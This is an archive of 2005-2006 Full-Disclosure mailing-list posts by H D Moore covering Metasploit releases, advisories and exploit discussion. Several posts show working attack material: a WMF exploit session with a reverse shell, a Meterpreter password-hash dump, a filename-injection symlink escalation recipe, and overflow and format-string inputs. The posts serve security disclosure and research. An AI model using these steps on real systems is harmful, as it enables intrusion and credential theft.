[Full-disclosure] Metasploit Framework v2.5

2005-10-18 Thread H D Moore 
The Metasploit Framework is an advanced open-source exploit
development platform. The 2.5 release includes three user interfaces,
105 exploits and 75 payloads.

The Framework will run on any modern operating system that has a working
Perl interpreter. The Windows installer includes a slimmed-down version
of the Cygwin environment.

This is a maintenance release - all updates to 2.4 have been rolled into
2.5, along with some new exploits and minor features.
  
This release is available from the Metasploit.com web site:
  - Unix:  http://metasploit.com/tools/framework-2.5.tar.gz
  - Win32: http://metasploit.com/tools/framework-2.5.exe

A demonstration of the msfweb interface is running live from:
  - http://metasploit.com:5/
 
Information about version 3.0 has been posted online:
  - http://metasploit.com/projects/Framework/msf3/
  
Exploit modules designed for the 2.2 through 2.4 releases should maintain
compatibility with 2.5. If you run into any problems using older
modules with this release, please let us know.

The Framework development team consists of a few active members and
over a dozen contributors. Check out the donations web page for a complete
list of contributors:
 - http://metasploit.com/donate.html

You can subscribe to the Metasploit Framework mailing list by sending a
blank email to framework-subscribe[at]metasploit.com. This is the
preferred way to submit bugs, suggest new features, and discuss the
Framework with other users.

If you would like to contact us directly, please email us at:
msfdev[at]metasploit.com.

For more information about the Framework and this release in general,
please refer to the online documentation, particularly the User Guide:
  - http://metasploit.com/projects/Framework/documentation.html


Enjoy!

- The Metasploit Framework Development Team
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Snort BackOrifice Fun

2005-10-19 Thread H D Moore 
Attached some in-progress code for the snort bug, getting through the 
while() loop that modifies both 'i' and 'len' is annoying. Any ideas on 
making this more reliable? It works great on my -ggdb version , but runs 
off a page during a memcmp() on my normal binary.

-HD


snort_bo_ping.pm
Description: application/perl-module
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SEC-Consult SA 20051025-1 :: RSA ACE Web Agent XSS

2005-10-25 Thread H D Moore 
I believe 5.2 and 5.3 are vulnerable as well, there are other fun bugs 
hiding in there too :) Filemon rocks.

-HD

On Tuesday 25 October 2005 15:26, Bernhard Mueller wrote:
> This flaw was discovered in version 5.1 of RSA Agent for Web. No other
> versions were available for testing. Web Agents >5.1 may also be
> vulnerable.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Google Search Appliance proxystylesheet Flaws

2005-11-20 Thread H D Moore 
This document can be found online at:
 - http://metasploit.com/research/vulns/google_proxystylesheet/

Title:
Google Search Appliance proxystylesheet Flaws

Release Date:
November 21, 2005

Patch Date:
August 16, 2005

Reported Date:
June 10, 2005

Vendor:
Google

Systems Affected:
Google Mini Search Appliance (confirmed)
Google Search Appliance (possible)

Summary:
The Google Search Appliance allows customization of the search interface 
through XSLT style sheets. Certain versions of the appliance allow a 
remote URL to be supplied as the path to the XSLT style sheet. This 
feature can be abused to perform cross-site scripting (XSS), file 
discovery, service enumeration, and arbitrary command execution.

Vendor Status:
Google has released a patch and advisory (GA-2005-08-m, to clients only).

Exploit Availability:
A Metasploit Framework module has been developed for the XSLT Java Code 
Execution flaw: google_proxystylesheet_exec.
No code is required to exploit the other flaws.

Researcher(s):
H D Moore (hdm[at]metasploit.com)

Vulnerability Details:
The Google Search Appliance search interface uses the 'proxystylesheet' 
form variable to determine what style sheet to apply to the search 
results. This variable can be a local file name or a HTTP URL.

Error Message XSS
A cross-site scripting flaw can be exploited by providing a snippet of 
malicious Javascript code for the proxystylesheet variable. The appliance 
will look for a local file by that name and then display an error message 
containing the Javascript code.

File Existence Verification
It is possible to determine the existence of any file on the system by 
using a relative path from the style sheet directory. The error message 
returned from the server will disclose whether or not a valid path was 
provided. This can be used to fingerprint the base operating system and 
kernel version.

Service Discovery
A rudimentary port scan can be performed by requesting HTTP URLs that 
point to a target system and individual ports on that system. The error 
message returned from the server will differ between open and closed 
ports. The appliance will ignore requests to connect back to itself, but 
no other restrictions apply.

XSLT Style Sheet XSS
A cross-site scripting flaw can be exploited by creating a malicious XSLT 
style sheet and specifying the URL to this style sheet in the 
proxystylesheet parameter. The appliance will download the style sheet 
and present the malicious Javascript to the user who executed the search.

XSLT Java Code Execution
It is possible to execute arbitrary Java class methods on the appliance by 
creating a malicious XSLT style sheet. System commands can be executed as 
an unprivileged user, which combined with the vulnerable kernel version, 
can lead to a remote root shell. The appliance uses the Saxon XSLT 
parser, which allows the following snippet to work:



XSLT Version:  

XSLT Vendor:  

XSLT URL:  

OS: 

Version: 

Arch: 

UserName: 

UserHome: 

UserDir: 


Executing command...

  


Notes:
The Google security team responded immediately to our report and were 
generally very helpful throughout the disclosure process. After a fix was 
developed, they offered to send us a Mini to verify that all issues had 
been addressed. Prior to shipping the appliance, they asked for an NDA 
and a license agreement to be signed and sent back. The NDA and license 
agreement both included clauses that restricted reverse engineering and 
other facets of security research. The NDA prohibited the publication of 
any information deemed confidential by Google without a prior written 
agreement. For any use other than security research, these conditions 
would not be an issue, however as they were written, any vulnerabilities 
discovered after the documents were signed could be considered 
confidential and restricted. We declined to sign the documents and Google 
placed a demo unit online for verification instead.

Humor:
This was found on Google Answers by Jericho: "No. The Google Search 
Appliance does not create security issues. All Google Search Appliance 
services are behind an internal firewall, protecting it from security 
intrusions. In addition, the Google Search Appliance has been thoroughly 
tested to guard against security risks. " ;-) 

References:
http://osvdb.org/20977
http://osvdb.org/20978
http://osvdb.org/20979
http://osvdb.org/20980
http://osvdb.org/20981
http://www.google.com/support/gsa/bin/answer.py?answer=15857
http://www.osvdb.org/blog/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Webmin miniserv.pl format string vulnerability

2005-11-29 Thread H D Moore 
On Tuesday 29 November 2005 04:07, [EMAIL PROTECTED] wrote:
> [snip ] so so if remote code execution is successful, it would
> lead to a full remote root compromise in a standard configuration. 

> DESCRIPTION.  The username parameter of the login form is logged via
> the perl `syslog' facility in an unsafe manner during a unknown user
> login attempt. the perl syslog facility passes the username on to the
> variable argument function sprintf that will treat any format
> specifiers and process them accordingly.
>
> DETAILS.  The vectors for a simple DoS of the web server are to use the
> %n and %0(large number)d inside of the username parameter, with the
> former causing a write protection fault within perl leading to script
> abortion, and the latter causing a large amount of memory to be
> allocated inside of the perl process.

Sys::Syslog calls sprintf($format, @_). I tried testing this on perl 5.8.7 
and don't see how this can be exploitable.  The %n specifier results in 
the following error message:

$ perl -e 'sprintf("%n")'
Modification of a read-only value attempted at -e line 1.

Using a thousand %p's results in the same address (presumably of the 
temporary char *) over and over again

It is possible to memory starve webmin with a long %99d string, 
but arbitrary memory writes seem to be out of the question.

What version of perl was used by the third-party to exploit this?

-HD
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Webmin miniserv.pl format string vulnerability

2005-12-01 Thread H D Moore 
As many folks have pointed out and consistent with the recent Dyad 
advisory, these bugs are indeed exploitable. I only mention this because 
a reporter quoted someone who quoted my original message and then used it 
to downplay the severity of the problem. 

$ perl -e 'printf("%2918905856\$vs")'

-HD


On Tuesday 29 November 2005 11:15, H D Moore wrote:
> On Tuesday 29 November 2005 04:07, [EMAIL PROTECTED] wrote:
> > [snip ] so so if remote code execution is successful, it would
> > lead to a full remote root compromise in a standard configuration.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Rogue Network Link Detection

2005-12-05 Thread H D Moore 
I found an old document and some crappy perl code on my system, figured 
someone might find it interesting:

"Unauthorized network links are one of the biggest problems facing large 
enterprise networks. Users intent on bypassing corporate proxies will 
often use cable modems, wireless networks, or even full-fledged T1s to 
access the internet. These network links can have a drastic affect on 
organizational security; any perimeter access controls are completely 
bypassed, making it nearly impossible for the administrators to 
effectively concentrate their monitoring and intrusion prevention 
efforts. This document attempts to describe different approaches and 
techniques that can be used to detect these rogue network links."

http://metasploit.com/research/misc/rogue_network/

-HD
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] PGP Wipe Free Space, Lyris ListManager Flaws, Windows Timestamps, Sam Juicer

2005-12-08 Thread H D Moore 
The Metasploit Project has released three new vulnerability sets and a 
password dumping extension to the Meterpreter payload. Enjoy!

-HD

[ PGP Desktop Wipe Free Space Flaw ]

PGP Desktop includes a Wipe Free Space utility that claims to eliminate 
data in all the free space on your hard drive including the the little 
areas after the end of existing files which may still have old data left 
behind. In short, the utility claims to wipe file slack space, the unused 
space in a disk cluster. The software does not work as advertised. It 
does not clean slack space.
- http://metasploit.com/research/vulns/pgp_slackspace/


[ Lyris ListManager Multiple Flaws ]

The Lyris ListManager software is vulnerable to numerous SQL injection, 
source code dislosure, and authentication bypass flaws. The ListManager 
software runs on Linux, Solaris, and Windows and can be configured to use 
one of the following database backends: PostgreSQL, Oracle, and 
MSSQL/MSDE. These flaws can be used to gain complete access to the 
ListManager data and often the host server itself.
- http://metasploit.com/research/vulns/lyris_listmanager/


[ Windows File Time Stamp Display Flaw ]

Windows file time stamps can be set to extremely low values via the 
NtSetInformationFile() system call. The Windows API does not properly 
translate the low 64-bit time values stored on disk into human readable 
format, and displays no information instead. Although this is not a 
security vulnerability in itself, it adversely affects third-party 
applications that rely upon the Windows API to perform the translation.
- http://metasploit.com/research/vulns/windows_timestamp/

[ Sam Juicer ]

A new extension has been added to the Meterpreter uber-payload in the 
Metasploit Framework. This extension allows you to dump the local Windows 
password hashes from a Meterpreter shell. The password dump is 
accomplished without writing any files to disk, as opposed to any version 
of pwdump available today. The Sam Juicer extension can be obtained via 
'msfupdate' or by downloading the latest snapshot of v2.5 of the 
Metasploit Framework. After successfully exploiting a system with one of 
the 'meterpreter' payloads, run the following commands to load the 
extension and dump the password hashes:

msf lsass_ms04_011(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Windows 2000 target
[*] Sending request...
[*] Got connection from 192.168.0.100:4321 <-> 192.168.0.252:1124
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -=connected to=- ]
[ -= meterpreter server =- ]
[ -=v.  0500=- ]
meterpreter>

<< load the Sam extension with the 'use' command >>

meterpreter> use -m Sam
loadlib: Loading library from 'ext551353.dll' on the remote machine.
loadlib: success.

<< use the gethashes command to dump the local password hashes >>

meterpreter> gethashes
Administrator:500:ec6r3a5c0k6mce249053939542f2c6c4:cp6wan5tahdibs94e89e2ffb49f307fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[ snip ]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] McAfee VirusScan vs Metasploit Framework v2.x

2005-12-09 Thread H D Moore 
Hi everyone,

Looks like some overzealous idiot at McAfee added "Trojan" signatures for 
202 files in the latest version of the Metasploit Framework. If you use 
the Framework for your job and have a McAfee support contract, *please* 
call them and let them know that their product is incorrectly tagging a 
standard security tool as a "Trojan" and that this is interfering with 
your ability to conduct business. 

Business customers in the USA can contact McAfee Technical Support by 
phone at 1-800-338-8754 or online at the following URL:
- http://www.mcafee.com/us/support/technical_support/

Home users seem to be out of luck for phone support, but can contact 
McAfee through the TS portal:
- http://ts.mcafeehelp.com/?siteID=1

Thanks!

-HD
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Symlink attack techniques

2005-12-14 Thread H D Moore 
Assuming that the find command will report a directory or file that you 
control, 
you can use the symlink to overwrite a shell script, and then place shell 
commands
into your file name:

$ mkdir \`cd\..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ tmp\;sh\ root.sh\`
$ echo id > /tmp/root.sh
$ chmod +x /tmp/root.sh

$ ln -s /etc/profile /tmp/report

# find / [args]  > /tmp/report
# su - (executes /etc/profile)
/tmp/report: line 1: cd..: command not found
/tmp/report: line 1: ./uid=0(root): No such file or directory

Some potential shell scripts include /etc/profile, /etc/cron.*/*, and 
/etc/profiles.d/*.

-HD

On Wednesday 14 December 2005 16:42, Werner Schalk wrote:
> On a Unix system there is a cronjob set up which will use the find
> command to create some sort of report and output that report to a
> predictable file in /tmp. So basically the command in the crontab is
> something like:
>
> 15 4  * * 6 root/usr/bin/find [command] > /tmp/report.txt
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Metasploit Framework v3.0 Alpha Release 1

2005-12-14 Thread H D Moore 
The Metasploit staff is proud to present the first alpha release of the 
3.0 branch of the Metasploit Framework. This release marks a major 
milestone in the evolution of the Metasploit Framework and is based on a 
complete rewrite of the 2.x series.

The 3.0 branch is designed to provide automation capabilities at every 
stage of the discovery and exploitation process. Nearly every component 
of the framework can be extended, hooked, and automated, allowing for 
streamlined penetration testing and tight integration with third-party 
products. Unlike the 2.0 series, the 3.0 branch is written in Ruby, an 
object-oriented, interpreted scripting language, that has drastically 
simplified the implementation of the framework.

This release includes 44 exploits, 76 payloads, 7 encoders, 2 nops, and 2 
recon modules. The supported platforms are Linux , Mac OS X, and most 
BSDs. The framework requires version 1.8.1 or newer of the Ruby 
interpreter. Windows is not supported at this time, either through Cygwin 
or the native build. Mac OS X users will need to install Ruby from source 
(or an OSS package manager) due to a build error in the version of Ruby 
supplied with Mac OS 10.4.

The latest 3.0 code, developer documentation, and general information can 
be found online at the following location:
 - http://metasploit.com/projects/Framework/msf3/

This is an *alpha release*, expect things to break, crash, and generally 
not work very well. This version is being released to gather feedback 
from the community and to weed out the major bugs before entering the 
true beta period. There are many features that have not been completely 
implemented at this point and there are still some edges that will need 
to be smoothed out prior to the final release. A few major features are 
not implemented, including msfweb's exploit mode, some levels of session 
interaction, and the more user-friendly scripting APIs.

Bugs can be submitted to msfdev[at]metasploit.com, or by subscribing to 
the framework-beta mailing list. To subscribe, send a blank email to 
framework-beta-subscribe[at]metasploit.com.

To demonstrate how the 3.0 branch has simplified exploit development, 
check out the following code sample, which provides the exploit body for 
the 3Com 3CDaemon 2.0 FTP Username Overflow (3cdaemon_ftp_user.rb):

--- connect print_status("Trying target #{target.name}...") buf = 
Rex::Text.rand_text_english(2048, payload_badchars) seh = 
generate_seh_payload(target.ret) buf[229, seh.length] = seh 
send_cmd( ['USER', buf] , false ) disconnect handler ---

This release includes many new features that are not present in the 2.x 
series. The highlights are presented below:

[ The Metasploit Console Interface ]

The msfconsole interface in version 3.0 is similar to the 2.x series, 
however the available command set and interaction options have been 
dramatically extended.

* Backgrounded exploits -- It's now possible to execute an exploit in the 
background. This means you can have an exploit that triggers a passive 
vulnerability (such as a browser bug, a sniffer exploit, etc) while 
performing other tasks. Each successful exploit attempt will show up in 
the list of active sessions, any of which can be accessed at any time.

* Multi-session exploits -- Unlike the 2.x series, the 3.0 branch is 
capable of creating multiple sessions from a single exploit. This is 
especially useful in the context of passive exploits that can have 
multiple clients connecting.

* Multiple concurrent sessions -- It is possible to have more than one 
active session established. An active session can sent to the background 
through the ^Z sequence.

* IRB mode -- The console interface supports dropping into a Ruby 
scripting interface that allows direct interactation with the framework 
instance. This makes it possible to do low-level interaction with 
sessions and framework modules.

[ The Meterpreter Payload ]

The Meterpreter payload has been extended and refined for the 3.0 branch. 
The underlying architecture and design remains the same, but the feature 
set and interface has been greatly enhanced to not only make scripting 
the post-exploitation process possible but to also increase the level of 
functionality. Instead of having separate modules for each of the major 
subsystems (Fs, Process, Net, Sys), the 3.0 Meterpreter has merged all of 
these common elements into one extension called Stdapi (short for the 
Standard API). This API provides access to the file system, registry, 
network, threads, processes, user interface, and much more. Some of the 
cooler features of the new version of Meterpreter include:

* In-memory process migration -- This feature makes it possible to migrate 
the Meterpreter server instance to a completely different process, such 
as a system service like lsass.exe, without having to establish a new 
connection. Migrating to a privileged process has the added benefit of 
making the server impossible to kill without taking d

Re: [Full-disclosure] iDEFENSE Security Advisory 12.06.05: Ipswitch

2005-12-16 Thread H D Moore 
This may not be a limitation if you can use the argument-skipping syntax 
in msvcrt (ie. %4000$x).

-HD

On Friday 16 December 2005 08:32, FistFucker wrote:
>I don't think it's > exploitable because the user controlled string is
>many thousand bytes away from the stack pointer and you can only send 512
>bytes  to the SMTP daemon.
[snip]
> If someone was able to exploit this, I would be interested in exploit
> code or an explanation to learn from him.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Someone wasted a nice bug on spyware...

2005-12-27 Thread H D Moore 
In reference to:
http://www.securityfocus.com/archive/1/420288/30/0/threaded

I ported the exploit to the Metasploit Framework in case anyone wants to 
test it without installing a thousand spyware apps...

Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:

--http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
--http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1.

-HD

+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\\Desktop>  


On Tuesday 27 December 2005 14:20, [EMAIL PROTECTED] wrote:
> Warning the following URL successfully exploited a fully patched
> windows xp system with a freshly updated norton anti virus.
>
> unionseek.com/d/t1/wmf_exp.htm
>
> The url runs a .wmf and executes the virus, f-secure will pick up the
> virus norton will not.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Someone wasted a nice bug on spyware...

2005-12-28 Thread H D Moore 
On Wednesday 28 December 2005 19:16, Nick FitzGerald wrote:
> The fact it was used for installing spyware (and may have been so for
> near on two weeks now) simply shows you where the money is these days.

Its a sad state of affairs when $19.95 crapware scams make more money than 
cleaning out a few bank/egold/epoker accounts.

Since WMF/EMF is basically raw access to the GDI API, expect to see quite 
a few of these bugs. For the curious:

- http://msdn.microsoft.com/library/en-us/gdi/metafile_250z.asp

For anyone using the Metasploit module (aka crappy wrapper around the 
original file), keep in mind that for the exploit to work, you need to 
request a path from the attacking system path ending in .wmf (or .tiff, 
or .emf, or ...). The exploit has been tested against non-english 
versions of Windows as well (Polish, Spanish, a few others) and works 
just fine as long as DEP is turned off.

-HD
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] WMF: New Metasploit Framework Module

2005-12-30 Thread H D Moore 
We just released a new version of the Metasploit Framework exploit module 
for the Escape/SetAbortFunc code execution flaw. This module now pads the 
Escape() call with random WMF records. You may want to double check your 
IDS signatures -- most of the ones I saw today could be easily bypassed 
or will false positive on valid graphic files.

Available via msfupdate, the 2.5 snapshot, or straight from the web site:
http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile

-HD
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WMF Exploit

2006-01-04 Thread H D Moore 
From my experience on XP/2003, IE will only render WMF files as images if 
the "placeable" header has been added before the WMF header. The addition 
of the "placeable" header prevents the SetAbortProc from being reached in 
the Escape() function, due to a check on the device context (credits to 
mr. anonymous for that gem, I spent an hour beating my head on it).

I will try to publish an "exploit faq" later tonight, seems to be way too 
much confusion about this flaw...

-HD

On Wednesday 04 January 2006 17:27, Crist J. Clark wrote:
> IE 6 displayed WMF files on a test Win98 system just fine for
> me.
>
> Remember, just because when you double-click on a WMF file
> Windows Explorer doesn't know what to do with it does NOT mean
> that when presented to IE in an  tag, it won't. Even trying
> to open the file with IE doesn't mean anything. You need to
> try it in a webpage.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Exploiting WMF (tiny) FAQ

2006-01-05 Thread H D Moore 
Q) Why did you release an IDS and AV evading exploit module so soon after 
the vulnerability was discovered?

A) The vulnerability was being exploited, in the wild, for at least two 
weeks (based on email reports) prior to the original BT post. The WMF 
structure is widely documented. The AV vendors were providing 
less-than-capable signatures for no reason other than that no public code 
was available that demonstrated alternate encodings. The IDS vendors were 
(and some still are) providing signatures that couldn't survive a single 
legal byte change in the WMF header. The release of a "polymorphic" (not) 
exploit forced the vendors to either fix their products or cry 
"irresponsibility" and give up. IPS vendors realized how SOL they are wrt 
to client-side HTTP attacks (so many encodings, so many ways to DoS an 
IPS that tries to decode them).

Q) The Windows Meta File format has a number of optional headers, can any 
of these be used to trigger the arbitrary code execution flaw via 
SetAbortProc?

A) No. The CLP headers (16 bit and 32 bit) cause the Picture and Fax 
Viewer (PFV) and Internet Explorer to throw an error when trying to 
render the image. Internet Explorer will only display an image internally 
if the "placeable" header has been prepend to the bare WMF header. If the 
"placeable" header exists, a device context check will fail during the 
call to Escape() and the SetAbortProc() function is not reached. This 
effectively prevents IE or the PFV from executing the SetAbortProc() call 
when any optional header has been prepended. This may not hold true for 
Explorer's preview and icon view.

Q) What about the Enhanced Meta File format? Does this format allow access 
to the exploitable function?

A) No. The EMF format has a separate API (which may or may not have its 
own problems), but it does not allow access to the WMF Escape() function. 
A WMF file can be delivered with the EMF extension however, which will 
cause it to be processed with the vulnerable API.

Q) Are there any other ways to obtain code execution besides via WMF files 
viewed by PFV or Explorer?

A) Yes. Any application that accepts WMF files and calls PlayMetaFile with 
the supplied data can be exploited. Some of these only recognize WMF 
files with the placeable header, which may prevent the application from 
reaching the SetAbortProc function. There are *many* other places where 
standard (ie. included with the OS) applications call the PlayMetaFile 
function, its just a matter of figuring out which ones can be used to 
deliver the malicious WMF content. A potential vector includes the 
display of icons stored inside of a standard executable. Viewing these 
files in an Explorer directory listing could result in the execution of 
code in an embedded WMF file. This has yet to be tested.

Q) What WMF header fields are mandatory for code execution through the 
PFV ?

A) Not many. The Windows Meta File header and possible field values are 
listed below:

# Possible values: 1 or 2 (memory or disk) 
WORD FileType

# The HeaderSize must always be 9 
WORD HeaderSize;

# The Version field can be 0x0300 or 0x0100 
WORD Version

# This parameter can be anywhere from 0x20 to 0x 
DWORD FileSize

# Completely arbitrary 
WORD NumOfObjects

# Completely arbitrary 
DWORD MaxRecordSize

# Completely arbitrary 
WORD NumOfParams

The MSB of the actual MetaFileRecord function field is completely ignored.

Credits: A number of anonymous sources contributed to this information.

More information on the WMF structure can be found at the following sites:
- http://wvware.sourceforge.net/caolan/ora-wmf.html
- http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Microsoft patches WMF... Wine is still exploitable?

2006-01-05 Thread H D Moore 
---
wine-20050930/dlls/gdi/driver.c
---

/** 
Escape  [EMAIL PROTECTED]
*/
INT WINAPI Escape( HDC hdc, INT escape, INT in_count, LPCSTR in_data, 
LPVOID out_data )
{
INT ret;
POINT *pt;

switch (escape)
{
case ABORTDOC:
return AbortDoc( hdc );
[ snip ]
case SETABORTPROC:
return SetAbortProc( hdc, (ABORTPROC)in_data );
[ snip ]

---
wine-20050930/dlls/gdi/printdrv.c
---

/**
 *   call_abort_proc16
 */
static BOOL CALLBACK call_abort_proc16( HDC hdc, INT code )
{
ABORTPROC16 proc16;
DC *dc = DC_GetDCPtr( hdc );

if (!dc) return FALSE;
proc16 = dc->pAbortProc16;
GDI_ReleaseObj( hdc );
if (proc16)
{
WORD args[2];
DWORD ret;

args[1] = HDC_16(hdc);
args[0] = code;
WOWCallback16Ex( (DWORD)proc16, WCB16_PASCAL, sizeof(args), args, 
&ret );
return LOWORD(ret);
}
return TRUE;
}


/**
 *   SetAbortProc   (GDI32.@)
 *
 */
INT WINAPI SetAbortProc(HDC hdc, ABORTPROC abrtprc)
{
DC *dc = DC_GetDCPtr( hdc );

if (!dc) return FALSE;
dc->pAbortProc = abrtprc;
GDI_ReleaseObj( hdc );
return TRUE;
}


---
wine-20050930/dlls/gdi/printdrv.c
---

/**
 *  EndPage  [EMAIL PROTECTED]
 *
 */
INT WINAPI EndPage(HDC hdc)
{
ABORTPROC abort_proc;
INT ret = 0;
DC *dc = DC_GetDCPtr( hdc );
if(!dc) return SP_ERROR;

if (dc->funcs->pEndPage) ret = dc->funcs->pEndPage( dc->physDev );
abort_proc = dc->pAbortProc;
GDI_ReleaseObj( hdc );
if (abort_proc && !abort_proc( hdc, 0 ))
{
EndDoc( hdc );
ret = 0;
}
return ret;
}

-HD
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WehnTrust - When you have to trust Wehntrust

2006-01-16 Thread H D Moore 
Any chance you contacted Wehnus about it? The "hot fix" is just to open 
regedit, browse to this key, and place the command line quotes. Minor 
problem, but I am sure Matt would have appreciated an email first.

-HD

On Monday 16 January 2006 14:47, Thierry Zoller wrote:
> Dear  List,
>
> Small blurp I came around; when Wehntrust creates the autostart key
> it forgets to correctly quote the string in the key and thus may
> trigger an autostart of c:\program.bat|exe|com up-on reboot... [2]
>
> Quoting [1] :
> 
> ---
>--- c:\program files\sub dir\program.exe,
>
> In this case, the system will successively expand the string when
> interpreting the file path, until a module is encountered to execute.
> The string used in the above example would be interpreted as follows:
>
>c:\program.exe
>c:\program files\sub.exe
>c:\program files\sub dir\program.exe
> ---
>--
>
> [1]
> http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038789
>.html [2] Only a real issue in Windows 2000, WinXP restricted
> users don't have the right to write to c:\
> [3] http://secdev.zoller.lu
> [4] http://www.wehnus.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerability/Penetration Testing Tools

2006-01-17 Thread H D Moore 
You should check out the Metasploit Framework:
 - http://metasploit.com/projects/Framework/


When I viewed the online demo of SAINT Exploit in December of 2005, nearly 
all of their exploit modules had names very similar to the ones found in 
version 2.5 of the Metasploit Framework. The demo has been updated since 
then and a handful of new exploits have been mixed in while others had 
their name changed. Oh, and their placement of a Google Adword on 
"metasploit" was a nice touch...


-HD


On Tuesday 17 January 2006 16:25, [EMAIL PROTECTED] wrote:
> All,
> I am in the process of researching a wide variety of penetration
> testing tools and vulnerability assessment tools. I've already
> researched many of the commercial tools like Coresecurity's Core Impact
> tool and even know a bit about the new tool that saint is about to come
> out with. What about open-source tools?
>
> Are there any open source tools like Core Impact that allow you to
> not only scan a network for vulnerabilities but then allow you to issue
> attacks against those vulnerabilities? I'm interested in both windows
> based and *nix based tools. Yes I am aware of nessus, exploit tree,
> metaspoloit etc... but none of those really have the "identify then
> attack" type of structure... they are either "identify" or "attack".
>
> -simon
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerability/Penetration Testing Tools

2006-01-17 Thread H D Moore 
Er, woops, misread - you want to scan and automatically exploit systems. 
This can be easily done with a little scripting and the available 
open-source tools. SensePost has a project called BiDiBLAH that 
integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit:
- http://www.sensepost.com/research/bidiblah/

The next version of the Metasploit Framework (v3) has support for 'recon' 
modules that technically you could use to automate this, but it will take 
some time before this is usable.

-HD


On Tuesday 17 January 2006 18:04, H D Moore wrote:
> You should check out the Metasploit Framework:
>  - http://metasploit.com/projects/Framework/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MailEnable Imapd remote BoF + Exploit [x0n3-h4ck]

2005-04-06 Thread H D Moore 
If you care at all about security, run, don't walk, away from this 
software. Another simple overflow via the "LOGIN" IMAP command:

A001 LOGIN (>1024 bytes)\r\n

-HD

On Tuesday 05 April 2005 12:31, expanders wrote:
> -=[+] Application:Mail Enable Imapd ( MEIMAP.exe )
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IIS hacking contest

2005-04-07 Thread H D Moore 
Marc,

I will buy you *two* Xbox's for a nice IIS 6.0 remote :-)

Seriously, the "market value" of a remote exploit for IIS 6.0 is
 somewhere between two and twenty thousand dollars, depending on how
 shady you want to get. These "find some 0day and give it to us"
